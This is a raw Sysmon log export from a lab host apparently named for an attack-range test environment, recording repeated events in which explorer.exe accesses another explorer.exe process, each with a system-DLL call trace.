16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235490Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235489Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235488Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235487Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235486Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235485Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235484Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235483Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235482Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235481Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235480Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235479Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235478Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235477Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235476Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235475Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235474Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235473Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235472Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235471Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235470Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235469Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235468Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235467Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235466Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235465Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235464Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235463Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 